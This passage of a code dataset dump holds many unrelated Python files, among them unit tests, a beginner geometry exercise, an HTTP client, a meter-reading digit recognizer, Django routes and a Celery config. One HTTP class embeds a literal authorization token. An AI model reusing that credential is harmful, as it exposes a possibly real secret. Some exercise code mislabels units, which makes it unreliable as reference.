PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=2,\n loss=0.2,\n step=6\n )\n\n list_training_data = [d1,d2,d3,d4,d5,d6]\n ret = TFConfigUtil.get_lastest_training_data_group_by_ps_config(list_training_data)\n assert(len(ret[c1]) == 2)\n assert(len(ret[c2]) == 2)\n\n def eq_pstuner_config(self):\n c1 = PSTunerConfiguration(\n num_ps=2,\n num_worker=2,\n inter_op_parallelism_threads=8,\n intra_op_parallelism_threads=8\n )\n c2 = PSTunerConfiguration(\n num_ps=2,\n num_worker=2,\n inter_op_parallelism_threads=8,\n intra_op_parallelism_threads=8\n )\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n )\n unittest.main()","sub_path":"test/test_tuner.py","file_name":"test_tuner.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"13983623","text":"# def mi_funcion(nS:int, nM:int, nW:int, wS:int, oS:int):\n# wS_perc = (wS/nS)*100\n# r_wSperc = round(wS_perc, 1)\n# oS_perc = (oS/nS)*100\n# r_oSperc = round(oS_perc, 1)\n# women_perc = (nW/nS)*100\n# r_wperc = round(women_perc, 1)\n# men_perc = (nM/nS)*100\n# r_mperc = round(men_perc, 1)\n# return(f\"Porcentaje de estudiantes que trabajan: {wS_perc}, Porcentaje de estudiantes que solo estudian: {oS_perc}, Porcentaje de mujeres es: {women_perc}, Porcentaje de hombres: {men_perc}\")\n# print(mi_funcion(8,4,4,3,5))\n\n# nS = int(input(\"Ingrese la cantidad de estudiantes de su grupo: \"))\n# nM = int(input(\"Del total, ¿cuántos son hombres?: \"))\n# nW = int(input(\"Del total, ¿cuántas son mujeres?: \"))\n# wS = int(input(\"Del total, ¿cuántos estudian y trabajan?: \"))\n# oS = int(input(\"Del total, ¿cuántos estudian solamente?: \"))\n# def mi_funcion(nS:int, nM:int, nW:int, wS:int, oS:int):\n# wS_perc = (wS/nS)*100\n# r_wSperc = round(wS_perc, 1)\n# oS_perc = (oS/nS)*100\n# r_oSperc = round(oS_perc, 1)\n# women_perc = (nW/nS)*100\n# r_wperc = round(women_perc, 1)\n# men_perc = (nM/nS)*100\n# r_mperc = round(men_perc, 1)\n# return(f\"Porcentaje de estudiantes que trabajan: {wS_perc}, Porcentaje de estudiantes que solo estudian: {oS_perc}, Porcentaje de mujeres es: {women_perc}, Porcentaje de hombres: {men_perc}\")\n# print(mi_funcion(nS, nM, nW, wS, oS))\n\n#Reto 1 grupo 85\n\ndef reto_1(F1:float, d:int, C1:float) -> str:\n R1 = (d/2)/100\n A1 = round((3.14*R1**2), 4)\n P1 = round((2*3.14*R1), 3)\n A2 = round(3.14*((R1*C1)**2), 4)\n F2 = (A2/A1)*F1\n F1 = f'F1 = {F1:.1F} N'\n A1 = f'A1 = {A1} m2'\n R1 = f'r1 = {R1} m2'\n P1 = f'P1 = {P1} m2'\n F2 = f'F2 = {F2:.1F} N'\n A2 = f'A2 = {A2} m2'\n return F1, A1, R1, P1, F2, A2\n\nprint(reto_1(-235, 345, 1/8))\n\n# def calculadoraRectangulo(ancho:float,largo:float)->str:\n# perimeter = 2*(ancho+ largo)\n# area = (ancho*largo)\n# return(f\"El cuadrado tiene un perimetro de: {perimeter} y un área de: {area}\")\n\n# print(calculadoraRectangulo(5.5, 3.5))","sub_path":"EJERCICIOS/RETO1.py","file_name":"RETO1.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29056757","text":"import http.client\nimport uuid\nfrom header import header\n\nclass request:\n\n end_point = \"\"\n headers = []\n\n def get(self, service):\n\n print('### GET METHOD ###')\n print('end_point -> ' + self.end_point)\n print('service -> ' + service)\n print('##############################')\n print('##############################')\n\n headers = {\n 'authorization': \"D8199B61-CD5C-4837-8616-9A43B8103E5D\"\n }\n\n for currentHeader in headers:\n print('headers -> ' + currentHeader)\n\n conn = http.client.HTTPSConnection(self.end_point)\n\n conn.request(\"GET\", service, '', headers=headers)\n res = conn.getresponse()\n print('STATUS: {0} {1}'.format(res.status, res.reason))\n data = res.read()\n\n return data.decode(\"utf-8\")\n","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"61078686","text":"from __future__ import print_function\nfrom multiprocessing.pool import ThreadPool\nimport cv2\nimport numpy as np\nfrom numpy.linalg import norm\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import datasets, svm, metrics\nimport math\nimport pickle\nimport time\nimport datetime\nimport sys\n\nw_SZ = 10\nh_SZ = 20 \n\ndef deskew(img):\n m = cv2.moments(img)\n if abs(m['mu02']) < 1e-2:\n return img.copy()\n skew = m['mu11']/m['mu02']\n M = np.float32([[1, skew, -0.5*h_SZ*skew], [0, 1, 0]])\n img = cv2.warpAffine(img, M, (w_SZ, h_SZ), flags=cv2.WARP_INVERSE_MAP | cv2.INTER_LINEAR)\n return img\n\ndef preprocess_hog(digits):\n samples = []\n for img in digits:\n gx = cv2.Sobel(img, cv2.CV_32F, 1, 0)\n gy = cv2.Sobel(img, cv2.CV_32F, 0, 1)\n mag, ang = cv2.cartToPolar(gx, gy)\n bin_n = 16\n bin = np.int32(bin_n*ang/(2*np.pi))\n bin_cells = bin[:10,:5], bin[10:,:5], bin[:10,5:], bin[10:,5:]\n mag_cells = mag[:10,:5], mag[10:,:5], mag[:10,5:], mag[10:,5:]\n hists = [np.bincount(b.ravel(), m.ravel(), bin_n) for b, m in zip(bin_cells, mag_cells)]\n hist = np.hstack(hists)\n\n # transform to Hellinger kernel\n eps = 1e-7\n hist /= hist.sum() + eps\n hist = np.sqrt(hist)\n hist /= norm(hist) + eps\n\n samples.append(hist)\n return np.float32(samples)\n\ndef predictDigits(model, rectDigits):\n intDigits = list()\n for i in range(0,len(rectDigits)):\n digits = np.array(rectDigits[i])\n digits = digits.reshape(-1, h_SZ, w_SZ)\n digits = list(map(deskew, digits))\n digits = preprocess_hog(digits)\n intDigits.append(int(model.predict(digits)[0]))\n return intDigits\n\ndef set2float(intDigits):\n reading = 0\n qtd = len(intDigits)\n for i in range(0, qtd):\n reading += intDigits[(qtd-1)-i]*math.pow(10,i)\n return float(reading)/1000.0\n\ndef set2string(intDigits):\n reading = \"\"\n qtd = len(intDigits)\n for i in range(0, qtd):\n reading = str(reading) + str(intDigits[i])\n return reading\n\ndef send2file(utc, timestamp, reading, usage, dV, dt, Q, Qma, counter, path, file, mode):\n f = open(path+file, mode)\n line = str(utc)+\" \"+str(timestamp)+\" \"+str(reading)+\" \"+str(\"%8.3f\"%usage)\\\n +\" \"+str(\"%6.1f\"%dV)+\" \"+str(\"%4d\"%dt)+\" \"+str(\"%6.1f\"%Q)+\" \"+str(\"%8.1f\"%Qma)\\\n +\" \"+str(counter)+\"\\n\" \n f.write(line)\n f.close()\n return None\n\ndef recogNsave(MIN_dV, Qn, FoS, rectDigits, roiBGR, edges, rightSideUP, ROI_PATH, IMS_UPDATE_PATH,\\\n LOGFILE_PATH, METRICS_PATH, LEARNING_PATH, ML_CLASSIFIER, counter, debug):\n\n if ML_CLASSIFIER == 1:\n model=\"digits_svm.pkl\"\n if ML_CLASSIFIER == 2:\n model=\"digits_mlp.pkl\"\n if ML_CLASSIFIER == 3:\n model=\"digits_knn.pkl\"\n\n if sys.version_info >= (3,0):\n with open(LEARNING_PATH+model, \"rb\") as f:\n svmModel = pickle.load(f, encoding=\"latin1\")\n else:\n with open(LEARNING_PATH+model, \"rb\") as f:\n svmModel = pickle.load(f)\n\n intDigits = predictDigits(svmModel, rectDigits)\n reading = set2float(intDigits)\n strReading = set2string(intDigits)\n\n f = open(METRICS_PATH+\"prevHydroMetrics.var\",\"r\")\n lines = f.readlines()\n part = lines[0].split()\n prevTime = float(part[1])\n prevReading = float(part[3])\n prevQ = float(part[6])\n prevQa = float(part[7])\n f.close()\n\n if float(time.time()) > prevTime:\n\n utc = datetime.datetime.utcnow().strftime(\"%Y/%m/%d@%H:%M:%S\")\n timestamp = int(time.time())\n dV = (reading-prevReading)*1000 \n dt = float(time.time()-prevTime)\n Q = (float(dV)/dt)*3600\n Qma = float((Q + prevQ))/2.0 \n\n if reading > prevReading and dV >= MIN_dV and Q <= Qn*FoS:\n\n cv2.imwrite(IMS_UPDATE_PATH+\"roi.jpg\", rightSideUP, [cv2.IMWRITE_JPEG_QUALITY, 75])\n cv2.imwrite(IMS_UPDATE_PATH+\"digits.jpg\", edges, [cv2.IMWRITE_JPEG_QUALITY, 75])\n cv2.imwrite(ROI_PATH+str(timestamp)+\".jpg\",roiBGR, [cv2.IMWRITE_JPEG_QUALITY, 75])\n\n if debug:\n print (\"\")\n print (\" UTC = \", utc)\n print (\" Timestamp = \", timestamp)\n print (\" READING = \", strReading)\n print (\" Usage = \", \"%.3f\" %reading, \"m3\") \n print (\" dV = \", \"%.1f\" %dV, \"L\")\n print (\" dt = \", \"%d\" %dt, \"s\")\n print (\" Q = \", \"%.1f\" %Q, \"L/h\")\n print (\" Qma = \", \"%.1f\" %Qma, \"L/h\")\n print (\" Try = \", counter, \"x\")\n\n send2file(utc, timestamp, strReading, reading, dV, dt, Q, Qma, counter, METRICS_PATH, \"prevHydroMetrics.var\", \"w+\")\n send2file(utc, timestamp, strReading, reading, dV, dt, Q, Qma, counter, LOGFILE_PATH, \"hydrometer.log\", \"a+\")\n\n elif reading == prevReading:\n\n if debug:\n print (\"\")\n print (\" UTC = \", utc)\n print (\" Timestamp = \", timestamp)\n print (\" READING = \", strReading)\n print (\" Usage = \", \"%.3f\" %reading, \"m3\") \n print (\" dV = \", \"%.1f\" %dV, \"L\")\n print (\" dt = \", \"%d\" %dt, \"s\")\n print (\" Q = \", \"%.1f\" %Q, \"L/h\")\n print (\" Qma = \", \"%.1f\" %Qma, \"L/h\")\n print (\" Try = \", counter, \"x\")\n\n send2file(utc, timestamp, strReading, reading, dV, dt, Q, Qma, counter, METRICS_PATH, \"prevHydroMetrics.var\", \"w+\")","sub_path":"digitsRecognizer.py","file_name":"digitsRecognizer.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"405072564","text":"from django.urls import include, path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path(\"\", views.index, name = \"TribalHome\"), \r\n path(\"about/\",views.about, name = \"AboutUs\"),\r\n path(\"contact/\",views.contact, name = \"ContactUs\"),\r\n path(\"tracker/\",views.tracker, name = \"TrackingStatus\"),\r\n path(\"search/\",views.search, name = \"Search\"),\r\n path(\"productview/\",views.prodView, name = \"ProductView\"),\r\n path(\"checkout\",views.checkout, name = \"checkout\"),\r\n]","sub_path":"tribal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"244009889","text":"# Reddit /r/dailyprogrammer Challenge #330 Easy Without Bonus\n\ndef get_input():\n \"\"\"\n Get comma separated coordinates from the user.\n \"\"\"\n print(\"Please enter comma separated coordinates:\")\n lines = []\n while True:\n line = input()\n if line:\n line = [float(x) for x in line.replace(\" \", \"\").split(\",\")]\n lines.append(line)\n else:\n break\n return lines\n\ndef get_bounds(circle):\n \"\"\"\n Return 4 bounding coordinates of a circle parallel to the axes.\n \"\"\"\n x_low = circle[0] - circle[2]\n y_low = circle[1] - circle[2]\n x_high = circle[0] + circle[2]\n y_high = circle[1] + circle[2]\n return x_low, y_low, x_high, y_high\n\ndef get_rectangle_coordinates(circles):\n \"\"\"\n Return the min and max x and y coordinates of the rectangle.\n \"\"\"\n x_min, y_min, x_max, y_max = 0., 0., 0., 0.\n for circle in circles:\n x_low, y_low, x_high, y_high = get_bounds(circle)\n x_min = min(x_min, x_low)\n y_min = min(y_min, y_low)\n x_max = max(x_max, x_high)\n y_max = max(y_max, y_high)\n return (x_min, y_min, x_max, y_max)\n\ndef print_rectangle_coordinates(solution):\n \"\"\"\n Print the coordinates to the bounding rectangle.\n \"\"\"\n print('({:.3f}, {:.3f}), ({:.3f}, {:.3f}), ({:.3f}, {:.3f}), ({:.3f}, {:.3f})'\\\n .format(solution[0], solution[1], solution[0], solution[3],\\\n solution[2], solution[3], solution[2], solution[1]))\n\n\nif __name__ == \"__main__\":\n circles = get_input()\n solution = get_rectangle_coordinates(circles)\n print_rectangle_coordinates(solution)\n\n","sub_path":"challenge#330easy/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"264664199","text":"from __future__ import unicode_literals\nimport importlib\nfrom goerr import err\nfrom django.apps import AppConfig\nfrom chartflo.engine import ChartFlo\n\n\nGENERATORS = {}\ncf = ChartFlo()\n\n\ndef load_generator(modname, subgenerator=None):\n try:\n path = modname + \".chartflo\"\n if subgenerator is not None:\n path = path + \".\" + subgenerator\n mod = importlib.import_module(path)\n generator = getattr(mod, \"run\")\n return generator\n except ImportError as e:\n if \"No module named\" not in str(e):\n err.new(e)\n return None\n except Exception as e:\n err.new(e, load_generator, \"Error loading module\")\n\n\nclass ChartfloConfig(AppConfig):\n name = 'chartflo'\n verbose_name = \"Chartflo\"\n\n def ready(self):\n \"\"\"\n Load generators and initialize class instance\n \"\"\"\n global GENERATORS, cf\n from django.conf import settings\n apps = settings.INSTALLED_APPS\n generators = {}\n for app in apps:\n try:\n res = load_generator(app)\n if res is not None:\n generators[app] = res\n except Exception as e:\n err.new(e, self.ready,\n \"Can not initialize Chartflo generators\")\n GENERATORS = generators\n if err.exists:\n err.trace()\n","sub_path":"chartflo/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23586540","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\n# HTML get request da página dos emojis\nEMOJI_URL = 'https://unicode.org/emoji/charts/full-emoji-list.html'\npage = requests.get(EMOJI_URL)\n\n# Conversão para BeautifulSoup para poder efetuar pesquisas nos elementos da página\nsoup = BeautifulSoup(page.content, 'html.parser')\n\n# Implementação da estrutura de pesquisa para obter Emoji, nome do emoji (em inglês devido ao site), e o seu código unicode\nresponse = soup.find_all(\"td\", class_=\"rchars\")\n\nwith open(\"./emojis\", \"w\") as listaEmojis:\n for em in response:\n parent = em.find_parent()\n\n # Emoji\n listaEmojis.write(parent.find(\n 'td', class_=\"chars\").contents[0] + \" \")\n\n # Emoji Name\n listaEmojis.write(parent.find(\n 'td', class_=\"name\").contents[0].title() + \" \")\n\n # Emoji ASCII\n listaEmojis.write(parent.find('td', class_=\"code\").find(\n 'a').contents[0] + \"\\n\")\n\n# Programa completo\ninput(\"[Scraping completado]\")\n","sub_path":"webScraper.py","file_name":"webScraper.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"285488176","text":"from django.contrib.auth.models import AnonymousUser\nfrom django.test import TestCase\n\nfrom accounts.models import User\nfrom accounts.templatetags.accounts import js_user\n\n\nclass AccountExtrasTestCase(TestCase):\n\n @staticmethod\n def generate_json(user_id, username='taavi', email='', name=''):\n return '{id:%s,username:\"%s\",email:\"%s\",name:\"%s\"}' % (\n user_id, username, email, name,\n )\n\n def test_js_user(self):\n user = User.objects.create_user('taavi')\n result = js_user(user)\n self.assertEqual(result, self.generate_json(user.id))\n\n user.email = 'taavi@test.com'\n result = js_user(user)\n self.assertEqual(result, self.generate_json(user.id, email='taavi@test.com'))\n\n user.name = 'Taavi Teska'\n result = js_user(user)\n self.assertEqual(result, self.generate_json(user.id, email='taavi@test.com', name='Taavi Teska'))\n\n user.name = '\" \\' \\\\ Teska'\n result = js_user(user)\n self.assertEqual(result, self.generate_json(\n user.id, email='taavi@test.com', name='\\\\u0022 \\\\u0027 \\\\u005C Teska',\n ))\n\n # Try to save the user - we should not get any errors\n user.save()\n\n def test_js_user_anonymous(self):\n user = AnonymousUser()\n\n result = js_user(user)\n self.assertEqual(result, 'null')\n\n def test_js_user_safe_string(self):\n user = User.objects.create_user('taavi')\n result = js_user(user)\n self.assertEqual(result, result.__html__())\n\n user = AnonymousUser()\n result = js_user(user)\n self.assertEqual(result, result.__html__())\n","sub_path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/accounts/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"424855130","text":"from environments.box2d_environment import Box2dEnvironment\nfrom agents.policy_gradient_agent import *\n\nN_TRAINING_EPISODES = 10\n\nenv = Box2dEnvironment(\"LunarLander-v2\")\nhistory = EpisodeHistory()\nagent = PolicyGradientAgent(env.get_state_dims(), env.get_n_actions())\n\nfor i in range(N_TRAINING_EPISODES):\n \n s0 = env.reset()\n done = False\n\n while not done:\n a = agent.choose_action(s0)\n a, s1, r, done = env.step(a)\n history.push(s0, a, r)\n s0 = s1\n\n train_s, train_a, train_r = history.flush()\n agent.train(train_s, train_a, None, train_r, None)\n","sub_path":"policy_gradient.py","file_name":"policy_gradient.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"520411567","text":"\nimport subprocess\nimport time\n\ndef parseLine(line):\n '''parse a line of gprof output (from the flat profiler), return a\n dictionary with the function's name, the percent of time spent in it, total\n time spent there, total time excluding subroutines, and number of calls'''\n\n line = line.strip()\n\n data = {}\n colNames = ['percent', 'total', 'self', 'calls']\n\n # parse each column\n i = 0\n for col in range(6):\n\n # parse a whitespace separated entry\n num = \"\"\n while i < len(line) and (line[i].isdigit() or line[i] == '.'):\n num += line[i]\n i += 1\n \n while i < len(line) and line[i].isspace():\n i += 1\n \n # if the format was incorrect, return None\n if len(num) == 0:\n return None\n \n # cast numeric columns to \n if col < 4:\n data[colNames[col]] = float(num)\n \n # the remainder of the line is the name\n data['name'] = line[i:]\n\n return data\n\ndef getFunction(funcInfo, name):\n '''get the information for a specific function; a subsection of the name\n sufficient to uniquely identify the function must be provided'''\n\n for fi in funcInfo:\n try:\n fi['name'].index(name)\n return fi\n except ValueError:\n pass\n\ndef getTopFunctions(fi, n = 5):\n '''Get the n functions that took the greatest portion of processing time'''\n\n fi.sort(key = lambda s: s['self'], reverse=True)\n if len(fi) < n:\n return fi\n \n return fi[:n]\n\ndef perfTest(E, s, M):\n '''perform a single performance test with E events, s sections per event,\n and M schedules considered; return the parsed gprof output'''\n\n # runt the program\n testProcess = subprocess.Popen(['./exe/EventSchedulerPerfTest', str(E), str(s), str(M)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n testProcess.wait()\n\n # run gprof\n gprofProcess = subprocess.Popen(['gprof', 'exe/EventSchedulerPerfTest', '--flat-profile'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n subStdout, subStderr = gprofProcess.communicate()\n\n # parse gprof output\n funcInfo = []\n lines = subStdout.decode('utf-8').split('\\n')\n for line in lines:\n fInfo = parseLine(line)\n if fInfo is not None:\n funcInfo.append(fInfo)\n\n return funcInfo\n\ndef timeTest(E, s, M):\n '''Test the total (real) time taken to execute the scheduling program'''\n\n t0 = time.time() # start timer\n\n # run te scheduilng program\n testProcess = subprocess.Popen(['./exe/EventSchedulerPerfTest', str(E), str(s), str(M)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n testProcess.wait()\n\n totalTime = time.time() - t0 #e nd timer\n\n return totalTime\n\ndef runTimingTests(tests):\n '''run multiple timing tests and print the results in a table'''\n\n print(\"E\\ts\\tM\\ttime (s)\")\n\n for test in tests:\n t = timeTest(test[0], test[1], test[2])\n print(test[0], test[1], test[2], t, sep=\"\\t\")\n\ndef runTopFunctions(tests):\n '''run multiple timing tests and print the top 5 costliest functions for\n each test'''\n\n for test in tests:\n print(f\"E = {test[0]}, s = {test[1]}, M = {test[2]}\")\n results = perfTest(test[0], test[1], test[2])\n results = getTopFunctions(results)\n for result in results:\n print('\\t', result)\n\ndef runFunctionAnalysis(tests, funcName):\n '''run multiple tests and extract the time spent in a particular function\n for each test; print the results in a table'''\n\n print(\"E\\ts\\tM\\ttotal\\t%\\tcalls\")\n for test in tests:\n results = perfTest(test[0], test[1], test[2])\n results = getFunction(results, funcName)\n print(test[0], test[1], test[2], results['self'], results['percent'], results['calls'], sep='\\t')\n\n\n# default set of tests that vary E, s, and M\ntests = [\n [100, 5, 1000],\n [200, 5, 1000],\n [400, 5, 1000],\n [800, 5, 1000],\n [100, 10, 1000],\n [100, 20, 1000],\n [100, 40, 1000],\n [100, 80, 1000],\n [100, 5, 2000],\n [100, 5, 4000],\n [100, 5, 8000],\n [100, 5, 16000],\n]\n\nrunTimingTests(tests)\n#runTopFunctions(tests)\n#runFunctionAnalysis(tests, 'sectionConflictsWithSchedule')","sub_path":"src/PerfAnalysis.py","file_name":"PerfAnalysis.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"328438184","text":"freq = dict()\nsmallest = dict()\n\ni = 1\nwhile True:\n r = tuple(sorted(list(str(i*i*i))))\n\n if r not in freq:\n smallest[r] = i\n freq[r] = 0\n\n freq[r] += 1\n if freq[r] == 5:\n print(smallest[r]**3)\n break\n\n i += 1\n","sub_path":"euler062.py","file_name":"euler062.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"441390065","text":"from __future__ import absolute_import\n\nfrom datetime import timedelta\nfrom celery.schedules import crontab\n#BROKER_URL = \"redis://10.1.9.9:6379\"\nBROKER_URL = \"redis://127.0.0.1:6379\"\n#CELERY_RESULT_BACKEND = \"redis://10.1.9.9:6379\"\nCELERY_RESULT_BACKEND = \"redis://127.0.0.1:6379\"\nCELERY_ENALBE_UTC = True\nCELERY_TIMEZONE = 'Asia/Shanghai'\nCELERY_TASK_RESULT_EXPIRES = 8 * 24 * 60 * 60 # expire task in 8 days\nCELERY_TRACK_STARTED = True\n\nCELERY_IMPORTS = (\"proj.tasks\",)\n\nCELERYD_TASK_TIME_LIMIT = 3600 # one hour\nCELERYD_TASK_SOFT_TIME_LIMIT = 1800 # half an hour\n\nCELERY_STORE_ERRORS_EVEN_IF_IGNORED = True\n\nCELERY_SEND_TASK_ERROR_EMAILS = False\nADMINS = (\n (\"wangdapeng\", \"wangdapeng@jike.com\"),\n (\"guoshaosong\", \"guoshaosong@jike.com\"),\n (\"liwei\", \"liwei@jike.com\"),\n)\n\nSERVER_EMAIL = \"testsinaweiboapi@gmail.com\"\n\nEMAIL_HOST = \"smtp.gmail.com\"\nEMAIL_PORT = 25\n\nCELERYBEAT_SCHEDULE = {\n 'task_add_periodic' : {\n 'task' : 'proj.tasks.add',\n 'schedule' : timedelta(seconds=2),\n 'args' : (16, 16)\n },\n}\n","sub_path":"python/gevent/celery/celery_user/proj/celery_config.py","file_name":"celery_config.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"303513130","text":"import requests\nfrom . import VkApi\nfrom datetime import datetime\n\nfrom wtflog import warden\nlogger = warden.get_boy('VK LongPoll')\n\nclass LP():\n key: str\n server:str\n ts: int\n time: float\n vk: VkApi\n wait: int\n\n def __init__(self, vk, wait = 25):\n 'vk - экземпляр VkApi'\n self.vk = vk\n data = vk('messages.getLongPollServer')\n if data.get('error'):\n if data['error']['error_code'] == 5:\n raise Exception('tokenfail')\n self.server = data['server']\n self.key = data['key']\n self.ts = data['ts']\n self.wait = wait\n\n @property\n def check(self):\n 'Возвращает список событий (updates)'\n response = requests.get(f\"http://{self.server}?act=a_check&key={self.key}&ts={self.ts}&wait={self.wait}&version=3&mode=2\")\n\n if response.status_code != 200:\n logger.error('Ошибка сети')\n return []\n\n self.time = datetime.now().timestamp()\n data = response.json()\n\n if 'failed' in data.keys():\n if data['failed'] == 1:\n logger.error('Ошибка истории событий')\n self.ts = data['ts']\n elif data['failed'] == 2:\n self.key = self.vk('messages.getLongPollServer')['key']\n else:\n raise Exception('Информация о пользователе утрачена')\n return []\n else:\n self.ts = data['ts']\n return data['updates']\n","sub_path":"microvk/user_longpoll.py","file_name":"user_longpoll.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"525686546","text":"from model.contact import Contact\nimport random\n\n\ndef test_delete_first_contact(app, db):\n if len(db.get_contact_list()) == 0:\n app.contact.create(Contact(firstname=\"test\", lastname=\"test\", address=\"fgd\", email=\"agnieszka@agnieszka.pl\",\n homephone=\"34242\", mobilephone=\"3244\", workphone=\"34245\", secondaryphone=\"334234\"))\n old_contacts = db.get_contact_list()\n contact = random.choice(old_contacts)\n app.contact.delete_contact_by_id(contact.id)\n new_contacts = db.get_contact_list()\n assert len(old_contacts) - 1 == len(new_contacts)\n old_contacts.remove(contact)\n assert old_contacts == new_contacts\n\n\n","sub_path":"test/test_del_contact.py","file_name":"test_del_contact.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616033408","text":"#!/usr/bin/python3\nimport argparse\nimport requests\nfrom datetime import timedelta, datetime\nimport pandas as pd\nfrom pandas import json_normalize\nimport json\n\ndef daterange(start_date, end_date):\n for n in range(int ((end_date - start_date).days)):\n yield start_date + timedelta(n)\n\nwith open('places.json', 'r') as fp:\n loc_dict = json.load(fp)\n\nparser = argparse.ArgumentParser(description='Place to get the data: Peninsula \\n IslasBaleares \\n Mallorca \\n Menorca \\n Ibiza \\n Formentera \\n Tenerife \\n ElHierro \\n GranCanaria \\n Lanzarote-Fuerteventura \\n Fuerteventura \\n LaGomera \\n Lanzarote \\n LaPalma')\nparser.add_argument('-p', '--place', type=str, required=True, help='Place to get the data: Peninsula \\n IslasBaleares \\n Mallorca \\n Menorca \\n Ibiza \\n Formentera \\n Tenerife \\n ElHierro \\n GranCanaria \\n Lanzarote-Fuerteventura \\n Fuerteventura \\n LaGomera \\n Lanzarote \\n LaPalma')\nparser.add_argument('-sd', '--start_date', required=True, type=lambda s: datetime.strptime(s, '%Y-%m-%d'), help='Place the start date: YYYY-MM-DD')\nparser.add_argument('-ed', '--end_date', required=True, type=lambda s: datetime.strptime(s, '%Y-%m-%d'), help='Place to end date')\nparser.add_argument('-o', '--opt', type=int, required=True, help='0=Consumtion, 1=Forecast')\nargs = parser.parse_args()\n\ndef download_data(place, start_date, end_date, opt):\n url = loc_dict['loc_dict'].get(place)[opt]\n for single_date in daterange(start_date, end_date):\n address = url + \"{}\".format(single_date.strftime(\"%Y-%m-%d\"))\n try:\n r = str(requests.get(address).content)\n except:\n pass\n inicial = r.find(\"{\")\n #Json file\n #f=open(\"{}.json\".format(single_date.strftime(\"%Y-%m-%d\")),\"w\")\n f=open(\"temp.json\",\"w\")\n f.write(r[inicial:-3])\n f.close()\n\n df = pd.read_json('temp.json')\n #print(json_normalize(df['valoresHorariosGeneracion']))\n json_normalize(df['valoresHorariosGeneracion']).to_csv(\"{}.csv\".format(single_date.strftime(\"%Y-%m-%d\")))\n\n\n# python main.py Peninsula 2020-02-10 2020-03-05 0\n# python main.py Mallorca 2020-02-10 2020-03-05 1\nif __name__ == '__main__':\n try:\n download_data(args.place, args.start_date, args.end_date, args.opt)\n except IndexError:\n print(\"No se puede hayar\")\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"450513877","text":"# Copyright (c) 2020 by Fraunhofer Institute for Energy Economics\n# and Energy System Technology (IEE), Kassel. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.\n\nfrom pandapipes.component_models.auxiliaries.component_toolbox import init_results_element\n\ntry:\n from numba import jit\nexcept ImportError:\n from pandapower.pf.no_numba import jit\n\ntry:\n import pplog as logging\nexcept ImportError:\n import logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Component:\n \"\"\"\n\n \"\"\"\n\n @classmethod\n def table_name(self):\n raise NotImplementedError()\n\n @classmethod\n def extract_results(cls, net, options, node_name):\n \"\"\"\n Function that extracts certain results.\n\n :param net: The pandapipes network\n :type net: pandapipesNet\n :param options:\n :type options:\n :return: No Output.\n \"\"\"\n output, all_float = cls.get_result_table(net)\n init_results_element(net, cls.table_name(), output, all_float)\n res_table = net[\"res_\" + cls.table_name()]\n return res_table\n\n @classmethod\n def get_component_input(cls):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def get_result_table(cls, net):\n \"\"\"Get result table.\n\n Parameters:\n :param net:\n :type net:\n :return:\n :rtype:\n \"\"\"\n raise NotImplementedError\n","sub_path":"pandapipes/component_models/abstract_models/component_models.py","file_name":"component_models.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55790436","text":"\nimport matplotlib.pyplot as plt\nfrom ipywidgets import interact, fixed\nimport numpy as 